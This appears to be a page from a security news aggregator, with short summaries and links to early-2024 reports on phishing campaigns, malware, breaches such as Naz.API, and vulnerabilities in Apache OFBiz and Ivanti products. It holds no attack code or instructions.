https://haveibeenpwned.com/PwnedWebsites#Trello
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV Debian multi-Arch Docker images now available!
We now offer official ClamAV docker images based on `debian:11-slim`.In addition to offering an alternative to the original Alpine Linux images, the new images are multi-arch images supporting `linux/amd64`, `linux/arm64`, and `linux/ppc64le`.ClamAV's Alpine-based and Debian-based Docker images are now built weekly to pick up security fixes in the base images. Check it out here.
http://blog.clamav.net/2024/01/clamav-debian-multi-arch-docker-images.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Burpsuite for Pentester: Autorize
In order to protect online assets, web application security testing is an essential element of safeguarding them. Burp Suite has been a leader in this
https://www.hackingarticles.in/burpsuite-for-pentester-autorize/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Widespread phishing campaign deployed by reemerging TA866

https://www.proofpoint.com/us/newsroom/news/widespread-phishing-campaign-deployed-reemerging-ta866
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cracked software beats gold: new macOS backdoor stealing cryptowallets
We review a new macOS backdoor that piggybacks on cracked software to replace Bitcoin and Exodus wallets with malware.
https://securelist.com/new-macos-backdoor-crypto-stealer/111778/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Invoice Phishing Alert: TA866 Deploys WasabiSeed & Screenshotter Malware

https://www.proofpoint.com/us/newsroom/news/invoice-phishing-alert-ta866-deploys-wasabiseed-screenshotter-malware
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Parrot TDS: A Persistent and Evolving Malware Campaign
Traffic detection system Parrot has infected tens of thousands of websites worldwide. We outline the scripting evolution of this injection campaign and its scope. The post Parrot TDS: A Persistent and Evolving Malware Campaign appeared first on Unit 42.
https://unit42.paloaltonetworks.com/parrot-tds-javascript-evolution-analysis/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Apache OFBiz Authentication Bypass (CVE-2023-51467, CVE-2023-49070)
What is the vulnerability? There is an authentication bypass vulnerability in Apache OFBiz tracked under CVE-2023-51467 and CVE-2023-49070. Successful exploitation would let an attacker circumvent authentication processes, enabling them to remotely execute arbitrary code and access sensitive information. Apache OFBiz is an open-source business application suite for Enterprise Resource Planning (ERP) which integrates and automates many of the business processes across industries. What is the Vendor Solution? Customers are advised to upgrade to Apache OFBiz version 18.12.11 to patch these vulnerabilities. For more information, please refer to the Apache Security Advisory. [ Link ] What FortiGuard Coverage is available? FortiGuard Labs has an IPS signature "Apache.OFBiz.CVE-2023-49070.XMLRPC.Insecure.Deserialization"...
https://fortiguard.fortinet.com/threat-signal-report/5363
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to Find Mistakes Earlier and Save Money With Code Security Audit
Learn how organizations can find mistakes earlier and save an average of ,037 using Code Security Audit.
https://www.hackerone.com/vulnerability-management/find-mistakes-save-money-code-security-audit
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

GitHub, PyTorch and More Organizations Found Vulnerable to Self-Hosted Runner Attacks
Last July, we published an article exploring the dangers of vulnerable self-hosted runners and how they can lead to severe software supply chain attacks. A recent blog post by security researcher and bug bounty hunter Adnan Khan provides strong evidence for the threats we outlined and their destructive outcomes. GitHub itself was found vulnerable, as well as various notable organizations, such as PyTorch, Tensorflow, Microsoft DeepSpeed, and Chia Networks.
https://www.legitsecurity.com/blog/github-pytorch-and-more-organizations-found-vulnerable-to-self-hosted-runner-attacks
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Stream-Jacking 2.0: Deep fakes power account takeovers on YouTube to maximize crypto-doubling scams
As of October 2023, researchers at Bitdefender Labs have been actively keeping tabs [https://www.bitdefender.com/blog/labs/a-deep-dive-into-stream-jacking-attacks-on-youtube-and-why-theyre-so-popular/] on steam-jacking attacks against high-profile YouTube accounts used to conduct a myriad of crypto doubling scams. Fast forward to 2024; our investigation into the fraudulent takeovers and usage of YouTube accounts has rendered new findings, as financially motivated threat actors meticulously evo
https://www.bitdefender.com/blog/labs/stream-jacking-2-0-deep-fakes-power-account-takeovers-on-youtube-to-maximize-crypto-doubling-scams/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Naz.API - 70,840,771 breached accounts
In September 2023, over 100GB of stealer logs and credential stuffing lists titled "Naz.API" was posted to a popular hacking forum. The incident contained a combination of email address and plain text password pairs alongside the service they were entered into, and standalone credential pairs obtained from unnamed sources. In total, the corpus of data included 71M unique email addresses and 100M unique passwords.
https://haveibeenpwned.com/PwnedWebsites#NazApi
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Dark web threats and dark market predictions for 2024
An overview of last year's predictions for corporate and dark web threats and our predictions for 2024.
https://securelist.com/darknet-predictions-for-2024/111763/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Threat Brief: Multiple Ivanti Vulnerabilities (Updated Feb. 8)
Multiple CVEs affecting Ivanti products: CVE-2023-46805, CVE-2024-21887, CVE-2024-21888, CVE-2024-21893 and CVE-2023-46805 are detailed in this threat brief. The post Threat Brief: Multiple Ivanti Vulnerabilities (Updated Feb. 8) appeared first on Unit 42.
https://unit42.paloaltonetworks.com/threat-brief-ivanti-cve-2023-46805-cve-2024-21887/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Rotating credentials for GitHub.com and new GHES patches